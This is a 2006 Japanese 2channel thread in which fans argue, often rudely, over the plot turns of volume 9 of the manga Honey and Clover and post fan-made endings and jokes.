ものづくりがどうこうとか言ってる奴、どうせ同人女だろ('A`)ウゼ

270 :花と名無しさん:2006/07/16(日) 23:27:17 ID:???0
>>261
ハチクロのそこが好きだったんだよ。
何気ない日常のなかのさりげない幸福、みたいな。いつかは消えてしまうけど青春のひと時、みたいな。
それがなんだか裏切られた気分になってしまったの大事件なんかおきちゃうと。

271 :花と名無しさん:2006/07/16(日) 23:27:43 ID:???O
修とリーダーと美和子マンセーな俺は大満足な9巻だった

272 :花と名無しさん:2006/07/16(日) 23:30:09 ID:???0
修が恋愛感情出してなければ、
別にはぐが他の人と付き合いったって擬似親子は続けられたと思うんだ。
「門限は9時だぞ!」とか言ってればよかったんだ。

273 :花と名無しさん:2006/07/16(日) 23:30:24 ID:???0
>>266
恋愛感情抜きならまぁ納得いくよ。
でも
(*`Д´)ノ「はぐは渡さん ハハハハハハハハ」
(*`Д´)ノ「ああ好きさ! 大好きさ!」
(*‘∀‘)「先生もオトコだったんですね!
(*`Д´)「(照)」

が、あるからなぁ。

274 :花と名無しさん:2006/07/16(日) 23:30:43 ID:???O
>>252
ばあさんって、はぐのばあちゃんのこと?修はぐがいとこなら、修も孫じゃん。
それと、いとこだろうがいとこの子供だろうが、年齢差に不自然なとこなんか
なくない?
うちの父のいとこなんて、私より年下だよw

275 :花と名無しさん:2006/07/16(日) 23:31:14 ID:???0
携帯臭は(・∀・)カエレ

276 :花と名無しさん:2006/07/16(日) 23:33:33 ID:???O
>>275
帰らない(^-^)/
お前がカエレ(^O^)

277 :花と名無しさん:2006/07/16(日) 23:34:45 ID:???0
>>274
ごめん、しゅうとはぐが叔父・姪だったら、だね。
だからそうすると
修とはぐ父が兄弟ってことになって
10歳差は(別に不自然て程でもないけど)けっこうでかいなと。


278 :花と名無しさん:2006/07/16(日) 23:39:20 ID:???0
>>232
それなんてガラスの仮面?

279 :花と名無しさん:2006/07/16(日) 23:39:24 ID:???0
むしろ姪って設定だった方が自然だった気がする。
そうすれば今の展開もなかったのに…。

280 :花と名無しさん:2006/07/16(日) 23:40:00 ID:???O
ちょっ、何コレ。過去ログ読んだけど、マジありえねぇ!!回りも止めろよ。森田、竹本も何で簡単に諦めるんだ?
誰ともくっつかないまま、前みたいに甘酸っぱいままの方が良かったよ

281 :花と名無しさん:2006/07/16(日) 23:41:00 ID:???O
もの作りの姿勢に問題があるのは間違いなくうみのタンなんだが。
ミーハーだったり萌え優先して痛々しいはっちゃけ振り披露したりと、同人出身作家ってあんまりいい話聞かない気が……

282 :花と名無しさん:2006/07/16(日) 23:41:30 ID:???0
そうなんだよ
9巻以降は
甘酸っぱさが
まったくなくなったんだよ。
どうしてくれようこの展開…

283 :花と名無しさん:2006/07/16(日) 23:44:45 ID:???0
森田の子供の頃がものすごくオタクが書きそうな絵だったので
しょっぱい気分になりましたよ?
なんでオタ女って足先に向かって太くするのが好きなんだ。

284 :花と名無しさん:2006/07/16(日) 23:47:22 ID:???O
修はぐよりなにより、散々ガイシュツだけど
はぐが大怪我という展開が安易すぎて萎えた

285 :花と名無しさん:2006/07/16(日) 23:49:42 ID:???O
>>261
もはやあんな恋はしたくないし元気どころか鬱になりますよ

286 :花と名無しさん:2006/07/16(日) 23:53:00 ID:???0
>>284
同意

287 :花と名無しさん:2006/07/16(日) 23:55:03 ID:???0
ところで
○○は死んでも××を離しませんでした って元ネタあるの?
2回くらい出てきてるよね。

288 :花と名無しさん:2006/07/16(日) 23:55:07 ID:???O
人生なんて そんなもんさ

289 :花と名無しさん:2006/07/16(日) 23:55:41 ID:???0
修司は死んでもはぐみを離しませんでした orz

290 :花と名無しさん:2006/07/16(日) 23:55:51 ID:???O
なんで皆漫画よんでんのかわかんなくない?
自分達が望んでない展開だからって文句垂れんのって違くない?
ウミノの漫画読むならこの展開も受け入れろ。
リアルと違うんだから。理想なんだから。

291 :花と名無しさん:2006/07/16(日) 23:55:53 ID:???0
リーダーが大怪我だったら泣くんだけどなー・・・

292 :花と名無しさん:2006/07/16(日) 23:57:21 ID:???0
>>290
釣れそうですか?

293 :花と名無しさん:2006/07/16(日) 23:59:29 ID:???0
>>287
戦時中の日本の教科書が元ネタ。

294 :花と名無しさん:2006/07/17(月) 00:01:38 ID:???O
修がキモス
とにかく恋する修を哀愁ただよう大人に戻してくれよ

295 :花と名無しさん:2006/07/17(月) 00:03:15 ID:???0
>>287
http://ja.wikipedia.org/wiki/%E6%9C%A8%E5%8F%A3%E5%B0%8F%E5%B9%B3

296 :花と名無しさん:2006/07/17(月) 00:04:31 ID:???O
>>290
だって 腐女子より性格悪い馬鹿の集まりだもん
ここの連中

297 :花と名無しさん:2006/07/17(月) 00:06:31 ID:???0
たとえば、
急にのびたと静香ちゃんが恋愛関係に発展しチューとかし始めたら
間違いなくみんなポカーンとする
それと同じなんじゃないかな。
望んでない展開に文句言ってる人もいるけど
自分は話の突然の方向転換っぷりに不満なんです。   うまいエサだった

298 :花と名無しさん:2006/07/17(月) 00:06:33 ID:???O
自演乙。w


299 :花と名無しさん:2006/07/17(月) 00:08:07 ID:???0
戦時中の教科書ってコワイヨー
真山のカップラーメンと、あとは何だっけ。森田?竹本か?

300 :花と名無しさん:2006/07/17(月) 00:08:21 ID:???O
>298
は>296に

301 :花と名無しさん:2006/07/17(月) 00:09:21 ID:???0
ラスト予想

はぐの大切な臭が、はぐの不注意が原因で死ぬ。
はぐは賢明に芸術作品を作りながらひとりで生きていく。
誰も臭の代わりにはなりえなかった。

それから10年後。

10年前の真山そっくりの青年に成長した倉持が
はぐのアトリエに押しかけて、助手として働く。
倉持ははぐにストーカーのようにアタック。

そして恋はつづいていく…

Fin


302 :花と名無しさん:2006/07/17(月) 00:12:55 ID:???O
>>298
アホw
自演と思ったら幸せだなwWW

303 :花と名無しさん:2006/07/17(月) 00:14:30 ID:???O
自演乙

304 :花と名無しさん:2006/07/17(月) 00:14:53 ID:???0
自演とかどうでもいい

305 :花と名無しさん:2006/07/17(月) 00:17:28 ID:???O
>>297
良い例え出た割につまんないこと言うんだね。
なんでそれを…
面白いと思わないんだ?
漫画はあっちこっち行くのが面白いんじゃないの?

306 :長文スマンorz:2006/07/17(月) 00:19:44 ID:???O
>>240
前スレ読んだ?

はぐが無自覚天然って話が出たのは、修の恋愛感情に対して女としての責任を取る覚悟があるのか?って所からだよ。

返す返さないって考えてたのははぐだから、当然修の恋愛感情にもちゃんと応える覚悟がないと、創作に便利だったから依存してるように見えちゃうって意味。

修に恋愛感情が無いか、はぐが気が付いて無かったら問題無いけど、修の気持ち知っててその部分を考慮しないで人生貰ってるならそれは天然以外の何モノでもないでしょう?
大人の女性として、人生くれる程愛してくれる相手の気持ちを考えないならそれは天然としか思えないよ。

因みに仕事で創作活動してるから、はぐの気持ちは分からん事はないけど、はぐの行動は天然だと思うよ。
今は必死で気遣いする余裕は無いんだとは思うけど、両想いの相手をふって選んだ相手だし、誠意を見せないとおかしいでしょう。

ある程度自立心がある人には伝わると思うけど、依存傾向強い人には理解不能かもしれないね。

修がただ、恋愛感情とか持たないで保護者として芸術の道を一緒にって言うなら問題無いんだよ。
修が恋愛感情持ってるから、恋愛の部分の話が絡むだけ。

別に恋愛史上主義じゃないから、修もはぐも余計な恋愛感情持たず、純粋にスッパリ芸術に進むなら綺麗だし別に良い。

何で修とはぐが恋っぽくなってるのか分からないって言ってるんだよ。
恋なら恋。芸術なら芸術。

キッパリしてくれ。

307 :花と名無しさん:2006/07/17(月) 00:20:12 ID:???0
9巻読んだ。はぐの両親が病院に来た後、
はぐが失ったものってなんですか?
長野で絵を描けなくなったってこと?

308 :花と名無しさん:2006/07/17(月) 00:23:19 ID:???0
これ不条理漫画だったっけ?

309 :花と名無しさん:2006/07/17(月) 00:24:50 ID:???O
つか、パグパパが来てたときの臭の顔が、自分は勝ち誇った様な顔にしか見えない

310 :花と名無しさん:2006/07/17(月) 00:25:21 ID:???O
>>307
帰りたいと願った場所

311 :花と名無しさん:2006/07/17(月) 00:26:23 ID:???0
9巻読んで、真山のクサイ台詞の複線がこの展開に対してだったことにへこんだ。
最初からはぐみ怪我→修はぐ決定だったのか…

あと海云々のくだり、なんであんなに暗いの?
これから明るい未来は待ってないのかねぇ。

312 :花と名無しさん:2006/07/17(月) 00:31:07 ID:???O
>>307
多分環境?
はぐの父親が再婚したんじゃない?

313 :花と名無しさん:2006/07/17(月) 00:33:12 ID:???0
>>305
それを面白いと思える人もいれば
こんな方向転換、プロとしての自覚がない、と腹が立つ人もいるの。

314 :花と名無しさん:2006/07/17(月) 00:34:45 ID:???0
>>311
何年たってもみんなが揃わない理由が必要だよね。
やっぱり一人殺すしかないんじゃ・・・

315 :花と名無しさん:2006/07/17(月) 00:34:50 ID:???0
父登場が唐突すぎてよくわかんなかった。
はぐ父ははぐのこと溺愛してなかったけ?

316 :花と名無しさん:2006/07/17(月) 00:34:53 ID:???O
>プロとしての自覚がないw

どゆ基準で何様だよって感じだなw

317 :花と名無しさん:2006/07/17(月) 00:35:32 ID:???O
プロの話の構成方法を知らない人には違和感ないのかもね。

318 :花と名無しさん:2006/07/17(月) 00:37:46 ID:???0

お金を払って読んでくれてる読者に対する裏切りだと思わないの?

319 :花と名無しさん:2006/07/17(月) 00:39:28 ID:???O
>>317
プロの構成方法って?
やっぱ鳥山とか富樫とか?ベテランが?


320 :花と名無しさん:2006/07/17(月) 00:39:47 ID:???O
>316はウミノ本人

321 :花と名無しさん:2006/07/17(月) 00:40:12 ID:???0
>>315
それは過去ログでかなりもめた
女たらし設定だった真山に
「はぐに手を出すなよ」と言う意味を込めた
修の作り話だったって説もあったな
かなり無理やりだが。

322 :302:2006/07/17(月) 00:41:20 ID:???O
>>318
じゃあ、どれだけの漫画家が読者を裏切ってんだろうな
大変だよな…

323 :花と名無しさん:2006/07/17(月) 00:42:26 ID:???0
夜釣りは楽しいですか?

324 :花と名無しさん:2006/07/17(月) 00:42:29 ID:???0
>>318
その気持ちは分かるけど、嫌な気持ちになっても
数ある漫画の中からこの漫画を選んでお金を払った方に責任はあるんだよ。

325 :302:2006/07/17(月) 00:42:54 ID:???O
やよね〜
森田はぐLOVEを期待してたのに
裏切るんだもん

326 :花と名無しさん:2006/07/17(月) 00:43:27 ID:???0
(゚д゚)

327 :302:2006/07/17(月) 00:44:37 ID:???O
ウミノ的の言葉で表すと
私ら読者は好きな人に裏切られた気分ww?

328 :花と名無しさん:2006/07/17(月) 00:48:22 ID:???0
金払って読んだ自分が悪い☆

329 :花と名無しさん:2006/07/17(月) 00:49:08 ID:???O
じゃぁもう買うのやめようか☆

330 :花と名無しさん:2006/07/17(月) 00:49:08 ID:???0
結局ウミノが描きたかったものと読者が読みたかったものは違ったんだよ

331 :花と名無しさん:2006/07/17(月) 00:49:24 ID:???0
というわけでみんなブックオフに走るわけですよ

332 :花と名無しさん:2006/07/17(月) 00:49:44 ID:???O
>>319
起承転結
テーマ性
伏線の構成方法

読者はこんなの詳しく知らなくても楽しめれば良いよ。
だから楽しく読んでるなら、良いと思うよ。

けど、叩きたいんじゃなくて、話として、あれはああいう意味?あのテーマはどうなったの?
あの描写の意味は無くなってしまうのでは?
と言う話をしたい人も居るので、おおらかな気持ちで…ね。

333 :花と名無しさん:2006/07/17(月) 00:50:16 ID:???O
明日ブクオフ逝きケテーイ

334 :花と名無しさん:2006/07/17(月) 00:51:20 ID:???0
それは欠陥住宅買った方が悪いって言ってるようなものですよ?

335 :花と名無しさん:2006/07/17(月) 00:51:41 ID:???0
9巻読んだ。
そか、終わるんだね。この話も。orz って感じ。

336 :花と名無しさん:2006/07/17(月) 00:52:53 ID:???O
ま 最終回で全て決まるだろ
自分も浦沢漫画やあだち漫画で何度も裏切られたからな
売ってないが
ハチクロはまだ 微妙

337 :花と名無しさん:2006/07/17(月) 00:53:00 ID:???O
打ち切りなのかも
スラムダンクの様に

338 :313:2006/07/17(月) 00:54:22 ID:???0
なんか私が変なこといったせいで、こじれにこじれてますね。
すみません・・・・・・・・・・・・

339 :花と名無しさん:2006/07/17(月) 00:54:56 ID:???O
打ち切りはお前等のラブ展開脳内

340 :花と名無しさん:2006/07/17(月) 00:54:57 ID:???0
ハチクロは欠陥住宅みたいなもんなのかw
じゃあ作者か出版社相手に裁判起こして賠償金でも求めれば

341 :花と名無しさん:2006/07/17(月) 00:58:53 ID:???0
>>337
そういえばスラダンも
発展途上中の不死身の天才を
あっさり怪我させて終わらせちゃったよね。

342 :313:2006/07/17(月) 00:59:23 ID:???0
>>340
比喩の変な部分だけ捉えんなよ。。
さっきからもめてんのは同一人物?

ところで
9巻はリーダーの「この人なんだかケモノのにおいがしますよ」に笑った。

343 :花と名無しさん:2006/07/17(月) 00:59:29 ID:???0
>>340
謝罪汁ニダ☆

344 :花と名無しさん:2006/07/17(月) 01:03:11 ID:A+53Q7jd0
>>337
打ちきりって何か知ってる?

345 :花と名無しさん:2006/07/17(月) 01:03:59 ID:???0
>>337
スラダンは打ちきりじゃないが?

346 :花と名無しさん:2006/07/17(月) 01:04:15 ID:???O
>>332
簡単で分かり易い例を一つ

真山って竹本とかの恋心応援してたよね?
あれ?いつの間に竹本忘れて修司の恋を応援?
友情って何?
そんな描写無かったよね?と疑問に思う。

普通に描写不足。
キャラがいきなり変わっちゃったようで、読者がおいてきぼりになる。

仕事で物語をかく人は、こういう混乱が少ないように考慮して描くんですね。

最近色々論議があるのは、その不足部分が沢山あるから。
修司の恋心が前々から描かれていたり、何か伏線があったり、丁寧な描写があればそんなに修はぐに驚く人も居ないと思う。

森はぐ期待してたからとか、そういう話じゃないんだよね。

347 :花と名無しさん:2006/07/17(月) 01:04:49 ID:???0
>>342
リーダーいいよね。
でも山崎と美和子の「一生友達☆」宣言のところの「美和子さんが幸せそうだからいっか」が
昔の修のセリフみたいでなんかキャラかぶってると思った。

348 :花と名無しさん:2006/07/17(月) 01:06:29 ID:???0
313の豹変っぷりは修並み

349 :花と名無しさん:2006/07/17(月) 01:10:28 ID:???0
よくわからないけど302とは友達になりたくないと思ったお(^ω^)

350 :花と名無しさん:2006/07/17(月) 01:12:45 ID:???O
あたしは このスレの人らと 語りたくないかも
嫉妬と怨みがメラメラ感じる

351 :花と名無しさん:2006/07/17(月) 01:15:19 ID:???0
読んでたら、顔の見えない他人と議論なんて、意味が無いことがとてもよく分かった。


352 :花と名無しさん:2006/07/17(月) 01:18:00 ID:???O
何か荒れてますね。
住人変わった?

353 :花と名無しさん:2006/07/17(月) 01:18:52 ID:2Tc+zf/TO
そろそろ皆お寝んねしようね(ヽ´ω`)

354 :花と名無しさん:2006/07/17(月) 01:20:24 ID:???0
荒れてるな。
漫画にあわせて怒涛の展開か。

355 :花と名無しさん:2006/07/17(月) 01:21:25 ID:???O
あえて恋愛(森田)じゃなくて修を選んだ
っていうラストは良いストーリー展開だと思うけどな。

自分、森田好きだから残念ではあるけどね。

356 :花と名無しさん:2006/07/17(月) 01:22:09 ID:???0
>>353
賛成(^ω^)ノシ オヤスミ

357 :花と名無しさん:2006/07/17(月) 01:24:14 ID:???0
みんななんだかんだ言って好きだから文句言っちゃうのよね☆

358 :花と名無しさん:2006/07/17(月) 01:28:14 ID:???0
天上天下・ハチクロと単行本買ってた漫画が
相次いで超展開で泣いた。

359 :花と名無しさん:2006/07/17(月) 01:29:04 ID:???O
>>357
好きじゃないとこのスレにも来ないと思うよ。
だから言葉から悪意とか必要以上に感じて怒らなくて良いよ。2ちゃんだし。

新展開に良いと思うファンも、ついてけなくなるファンも居るのが普通。
どっちが良いも悪いもないさ。

360 :花と名無しさん:2006/07/17(月) 01:34:08 ID:???0
スレくらいはまったり行きましょうぜ。
言葉遣いには気を使いつつね☆

361 :花と名無しさん:2006/07/17(月) 01:37:49 ID:GYKaE4ENO
9巻の内容重いよ…

僕はこんな展開嫌だよ(つд;*)
みんな幸せになろうよ…

362 :花と名無しさん:2006/07/17(月) 01:38:10 ID:KHbxVZ8ZO
>>359がいいこと言った

363 :花と名無しさん:2006/07/17(月) 01:39:14 ID:???O
>>290
いくら何でもそれは酷いだろう。
受け入れろって何様だよ

364 :花と名無しさん:2006/07/17(月) 01:40:40 ID:???O
>>296
オマエガナー

流石に今更うみの儲は痛々しいよ

365 :花と名無しさん:2006/07/17(月) 01:42:31 ID:???0
さっきっから何なんだ、
荒らしたいだけ?

366 :花と名無しさん:2006/07/17(月) 01:43:24 ID:???O
>>319
それは駄目な例だしw

367 :花と名無しさん:2006/07/17(月) 01:46:22 ID:???0
302はかまってちゃん?もう寝ろやお前。

368 :花と名無しさん:2006/07/17(月) 01:47:32 ID:???O
>>350
ハチクロやウミノテンテーに文句ゆーな!!1!
って言いたいならハッキリ言えば?

嫉妬も怨みもない
唐突な展開と描写の拙さに納得いかないだけ

369 :花と名無しさん:2006/07/17(月) 01:49:00 ID:???0
>>368
語りたくないらしいから放っておいてあげなよ

370 :花と名無しさん:2006/07/17(月) 01:50:57 ID:???O
ギャグシーンのドタバタ加減は同人誌のノリツッコミ的範囲から出てないな。

371 :花と名無しさん:2006/07/17(月) 02:01:35 ID:???O
てか、今の時点では、修はぐかも知んないけど、
最終的には判らなくね?

一番身近な知人が、恋人となるケースは多々あるけど、
その場合、以前からドキッみたいな自覚症状がなきゃ納得いかん。。。
他キャラに比べて、修はぐは成長してないし(寧ろ閉じこもって退行気味)、
また、一波乱あると思うのだが…

372 :花と名無しさん:2006/07/17(月) 02:04:54 ID:???0
叔父姪とか従姉妹とかじゃなく従兄弟の娘なんて微妙な遠縁設定の
時点で私は修ちゃんは範囲内だとずっと思ってた。

373 :花と名無しさん:2006/07/17(月) 02:08:35 ID:???0
>>371
入院中の検査で偶然、はぐが不治の病であることがわかった。
(はぐ父が訪ねてきて泣いてたっぽいのはそのせい)
はぐも「本当のことが知りたい」と言い、臭はそのことを伝え、
それでも一緒に戦っていこうと決めた。
はぐは「みんなには秘密にして」と言い、臭は自分がはぐに恋愛感情が
あることにして、ごまかした。
(なぜごまかせるのかはよくわからないが)

10年後、竹本のモノローグが「はぐちゃんは星になった」と始まり、
美術館にあるはぐの作品がみんなを暖かい光で包む。
作品の題名は「はちみつとクローバー」

なんてことを妄想したりもしたけど、多分妄想で終わるねw

374 :花と名無しさん:2006/07/17(月) 02:10:30 ID:???0
>>287
キグチコヘイは死んでもラッパを放しませんでした。

たしか、日清戦争か日露戦争の実話をもとにした話。
戦前の尋常小学校の修身の教科書に載っていたはず。

375 :花と名無しさん:2006/07/17(月) 02:16:30 ID:???0
それってギャグにしていい話なの?>ラッパ

376 :花と名無しさん:2006/07/17(月) 02:18:20 ID:???0
クローバーはあったけど
ハチミツはまだ出てきてないよね。
最終話で出てくるのかな。

377 :花と名無しさん:2006/07/17(月) 02:18:21 ID:???0
>>375
戦前にギャグにしたら憲兵に連れていかれただろうけど、
今はおとがめなしじゃないかのう。

378 :花と名無しさん:2006/07/17(月) 02:23:34 ID:???0
自分は、修ちゃんがはぐを甘やかしてた頃は、
ハチミツばっか食べてたら虫歯になるよ(=自分は甘やかしてばかりではぐをだめにしちゃう)
みたいな事をいいつつはぐを森田(なぜか修の中ではたけのこの恋は無視されてつ)のもとへ送り出すのかとおもってました。
くさいけどやつ等ならやりかねん。

379 :花と名無しさん:2006/07/17(月) 02:32:41 ID:???0
自分は一応美大を出て、その延長線上の仕事をしてて、
友人と話したが、恋愛より創作を取るつーか
造る事を捨てられないというのは理解できなくもないが
創作していく上で誰かが必要という発想が理解不能。
そんなヤツいねーよ。作者の願望だろ。

380 :花と名無しさん:2006/07/17(月) 02:35:57 ID:???0
だなあ。
作者の願望なんだろうなあ。
一人でマンガ書くの疲れましたよ?
堺雅人さんみたいな人に支えてほしいですよ?


381 :花と名無しさん:2006/07/17(月) 02:40:45 ID:???0
>>379
同意。
自分も美大を出て、哀しいことにニート中の者ですが
創作していくうえで必要なのはパートナーでなくパトロンだ。
これは本気でそう思う。


382 :花と名無しさん:2006/07/17(月) 02:48:16 ID:???0
   ,, - ―- 、
  ,. '" _,,. -…;   ヽ   
  (i'"((´  __ 〈    }  
  |__ r=_ニニ`ヽfハ  } 
  ヾ|!   ┴’  }|トi  }  
    |! ,,_      {'  }
   「´r__ァ   ./ 彡ハ、
    ヽ ‐'  /   "'ヽ
     ヽ__,.. ' /     ヽ
     /⌒`  ̄ `    ヽ\_
    /           i ヽ \
   ,'              }  i  ヽ
    {             j   l    }
   i   ヽ    j   ノ   |   } l


383 :花と名無しさん:2006/07/17(月) 02:50:45 ID:???0
>>382
 ・・・痩せたな・・・

384 :花と名無しさん:2006/07/17(月) 03:01:25 ID:???0
うーんわかる。金かかるんだよな。
特に立体になるとスペースもいるし・・・・・
やっぱ森田と行くべきだパグ。

385 :花と名無しさん:2006/07/17(月) 03:06:02 ID:9NAI4xnh0
>>379
こらこら天才を描くのに何か基準を持ってくるな。
400年必要と思うことをやり遂げたいだから臭みたいな
創造力はないが最高のアシが必要なんだろ。

>>381
よう!凡人

386 :花と名無しさん:2006/07/17(月) 03:14:19 ID:???O
ムサビ出てリーマンデザイナーやってるが、色々身につまされるお。
パトロンは勿論必要だが、創作に集中するには生活面全般のサポーターが必要。
自分の場合は会社とダンナというしょっぱい関係だが大切だ!
美大出は生活を甘くみるとツライヨとアドバイスしとく・・・。
ウマイ奴は両方握っとる!はぐはよくわかってる。

387 :花と名無しさん:2006/07/17(月) 03:22:26 ID:???0
はぐは、したたかな女なんだね。

388 :花と名無しさん:2006/07/17(月) 03:24:20 ID:???0
リアルはぐはこういうものか・・・


389 ::2006/07/17(月) 03:31:49 ID:ZqaN/kglO
『この恋は空の色ににてるね‥』
今では、そんなに爽やかじゃなくなった。まぁ、≪曇り空≫とかならそう言えるか。

390 : ◆Mikan/f1y. :2006/07/17(月) 03:34:55 ID:Z3tHxB4Y0
てす

391 :長文&ティラ裏スマソ…:2006/07/17(月) 03:38:46 ID:???0
時は3月某日、 長野行きの列車に乗車し出発を待っているはぐ。しばらく悶々としていたが 
列車が定刻を過ぎても出発していないことに気づき、おかしいと思って目を向けた先のホームに
大量の荷物を持った山田と竹本が現れる。2人に降車を促され、わけもわからず列車を降りるはぐ。
山田「はぐちゃん、空港へ向かうわよっ!」

列車の遅延により生じる莫大な損害賠償金&鉄道会社への根回しには森田(+バックについている組織)の、
留学に関する一切の手続きには修司の、はぐの実家への説明&お赤飯には藤原設計事務所&真山の、
海外へ飛ぶ際の荷物やらの準備には竹本&山田の、それぞれの熱烈な協力があり
「はぐのイタリアの美術研究機関への留学を叶える作戦」が(割と強引に)遂行されていたのだ。
  ちなみに作戦決行が決まったのはつい27時間前。
  はぐ送別会を終えた先生の研究室にて(はぐ不在)、「彼女は自分の気持ちに嘘ついてるだろ」議論が巻き起こったため。
  森田と修司は殴り合いにまで発展、竹本はとばっちりを受け、とうとう山田がキレて男三人衆を踵で沈める騒動に。
  ここで修司、自分の本心に正直になろうと改まった。森田も、自分を縛る面倒事との決着をつけに旅立つ。

空港へ向かう3人に手続きを終えた修司が合流。
「私はどうせすぐに修ちゃんに助けを求めてしまう。迷惑かけてしまう」と半泣き状態のはぐ。
「やっぱりモンゴルに誘った時のこと気にかけてたか・・・」
あれははぐが心配だったからではなく、芸術の申し子であるはぐと世界を見たいという自分の願望が一番の動機だったのだと
告げる修司。2人は長い間心にすれ違いを秘めていたのだ。「迷惑かけたって・・・いいんだぞ。すぐに飛んでってやる!」
はぐは彼女の成長を見てきてくれた山田や竹本にも励まされ、そして最後に森田の姿が頭に浮かぶ。
大切な人達の思いを受け止めたい、もう自分の気持ちに言い訳したくないと、ついに決心をする。

392 :長文&ティラ裏スマソ…:2006/07/17(月) 03:40:20 ID:???0
3年後
イタリアのはぐ(+修司)の住家にて懐かしのメンバー(除森田)でほのぼのパーティー開催。
またテレビに森田が出てる・・・と思いきや本人登場。はぐを連れ出しにかかり、はぐもそれに応じる。
ショック受ける先生をなだめる竹本。
しかしそんな2人も、面倒事から解放され真摯にはぐと対話をするようになった森田を認めるようになってきていて...



7巻とか8巻あたり読んでた頃はこんなラストがくるとガチで思ってた。
ドタバタガチンコ展開によりはぐ(と先生)の葛藤が解消してはぐは芸術の道を究める、と。
で、恋愛については自分はたけもこ応援してたが、有力なのは森田だろうと。

主人公大怪我とか先生色ボケとかアリエナスorz 海外留学とかはドウナッチャッテンノ?


393 :花と名無しさん:2006/07/17(月) 03:46:50 ID:???0
逆にあたしは
芸術で金儲けなんて!などと思ってるおおばか者だったので
金持ってる人と結婚したんだけど
やっぱり都内で自分のアトリエ持てるし
ちゃんと先生に習えるし
時間はゆっくり取れるし
(家事はハウスキーパーさんがやってくれるし)
相手に理解があれば最高ですよ。

とリアル寄生虫の私は言わせてもらう。
でもはぐみはコネをもってるって点では修を選ぶべきかな
ちゃんと子作りには応じてやれよ^^

394 :花と名無しさん:2006/07/17(月) 03:49:35 ID:???0
自分は会社も辞めてフリーでデザインやってて
一人で仕事も生活もこなしていくのは大変なのは分かっているからこそ、
はぐが天才だというならもっと突き抜けて欲しかったというか
そんなとこだけリアルというか、生々しく女でなくてもとも。
マンガなんだし、リアルを踏まえても、も少し強くいて欲しかったよ。
作者にしたら二人で生きてくって凄い前向きな展開なのかもしれんが
依存度ばかりが目立って、全然感動せん。

395 :花と名無しさん:2006/07/17(月) 03:53:41 ID:???0
あたし女・・・

396 :花と名無しさん:2006/07/17(月) 03:54:47 ID:???0
>>391
感動した。

397 :花と名無しさん:2006/07/17(月) 03:57:18 ID:???0
美大出なんてろくな人間いないのよ♪

398 :花と名無しさん:2006/07/17(月) 04:13:37 ID:???0
この漫画には、寄生して生きる人間と宿主になる人間しか出てきませんね☆

399 :花と名無しさん:2006/07/17(月) 04:20:16 ID:???0
でも真理かもしれない

400 :花と名無しさん:2006/07/17(月) 05:02:05 ID:???0
自分も寄生したいお☆

401 :花と名無しさん:2006/07/17(月) 05:02:42 ID:???0
はぐのプロポーズ?はひょっとして小山さんに向けていってるのかな?と思った俺ガイル。
羽海野先生がこれからも漫画家続けるつもりなら、一番そばにいて欲しいのはあの人なんじゃないかなと。


俳優萌えって話は顔が似てきてるから?にしても修の内面に堺が投影されてるとは思えんのだけど?
確かに羽海野先生はいろいろと影響されやすい人という気はするが、
仮に本人の内面関係なく顔だけで食いついたとして、
そんなミニマムな願望のために9巻まるまるつかって伏線はるような器用な人でもないでしょ。

自分の感覚ずれてるのかなあ。

402 :花と名無しさん:2006/07/17(月) 05:07:59 ID:blaof2zTO
自分なら金がある森田を選ぶキャラ的には告白時のたけもっくんが好みだが

403 :花と名無しさん:2006/07/17(月) 05:43:54 ID:???O
何このスレ。今日初めてのぞいてみたんだけど
普段からこんなに自分語りが多いの?
テラウザス

404 :花と名無しさん:2006/07/17(月) 08:10:33 ID:???0
はいはい携帯臭携帯臭

405 :花と名無しさん:2006/07/17(月) 08:39:36 ID:???O
ファンブックみたいなものにははぐが森田に恋しているって書いてあるのにね

それでも自分のことが大好きな作者

406 :花と名無しさん:2006/07/17(月) 08:54:52 ID:???0
「臭ちゃんは私の雨」だってはぐが心の中で語ってたけど
臭は雨は雨でも、植物を成長させる恵みの雨じゃなくて
物を腐らせる「酸性雨」じゃない?

はぐの心や精神をスポイルして腐らせる酸性雨=臭

407 :花と名無しさん:2006/07/17(月) 09:09:45 ID:???0
>>401
小山さんてだれだ?

とにかく、伏線って「前もってひそかに設けておくもの」だから
前もってでもひそかでもない9巻は伏線じゃないような…
元々この人終わり方とかを考えていなくて、設定も適当なようだから、
いくらなんでも「堺さん萌え〜」→「よし修はぐだ」ってのは無いと思いたいけど
脳内でどこか修びいきになって終わらせ方を考えたときに影響しちゃったんじゃないかな。

408 :花と名無しさん:2006/07/17(月) 09:12:49 ID:???O
設定では絶対森田パグだったと思う
物語が進むにつれ、ウミノの中で臭の存在が大きくなっちゃったと

409 :花と名無しさん:2006/07/17(月) 09:16:14 ID:???0
周りがちやほやするからじゃね?
「これどう?」「いいっすネ☆」みたいな職場だったから、
やりたい放題になったんじゃないんかな。

どうせ羽海野のアシスタントなんて同人時代からの付き合いなんだろうし、
みんな腐女子だろ、ウミノマンセーな。

410 :花と名無しさん:2006/07/17(月) 09:17:29 ID:???O
ウミノって本当に同人描いてたの?
すごく驚いた

411 :花と名無しさん:2006/07/17(月) 09:20:39 ID:???0
過去をほじくりかえすのも悪いけど
やっぱり同人出身てのがでかいと思う。
だって花道とフジマなんて、ほんと竹本と徳大寺先生くらいありえないじゃん・・・・・
そういう感覚が欠如してるんジャマイカ?

412 :花と名無しさん:2006/07/17(月) 09:21:47 ID:???0
描いてたよ、ヤフオクとかに出品されていい値がついてますよ?

413 :花と名無しさん:2006/07/17(月) 09:28:50 ID:???O
まじか…
しかもホモ同人

414 :花と名無しさん:2006/07/17(月) 09:28:51 ID:???0
元々誰とくっつけるとかじゃなく、
恋する大学生集団を淡々と描いてくのかと思ってた。
結果じゃなく過程重視で。
だから微森はぐをにおわせつつフェードアウトしてくのかと思ってたら
も.さあ誰を選ぶ!?状態だね。

415 :花と名無しさん:2006/07/17(月) 09:30:58 ID:???0
>>413
でもなんかわかる気しない?
自分はそれ聞いたとき、ああこの違和感の元はそれかって納得した。

416 :花と名無しさん:2006/07/17(月) 09:31:00 ID:???0
褒めてた森博嗣も同人やってたから理解があるんだろうね。

417 :花と名無しさん:2006/07/17(月) 09:34:02 ID:???0
>>414
自分も、みんなの一生のうち一番セツナイ青春だけを切り取りましたって話かと思った。


418 :花と名無しさん:2006/07/17(月) 09:36:34 ID:???0
同人でもパロディじゃなければ許すんだが。

419 :花と名無しさん:2006/07/17(月) 09:39:21 ID:???0
>>403今日初めてのぞいたとかいう自分報告はいらん

420 :花と名無しさん:2006/07/17(月) 09:43:37 ID:???O
臭あぼーんで良いよ、もう

421 :花と名無しさん:2006/07/17(月) 09:45:50 ID:???0
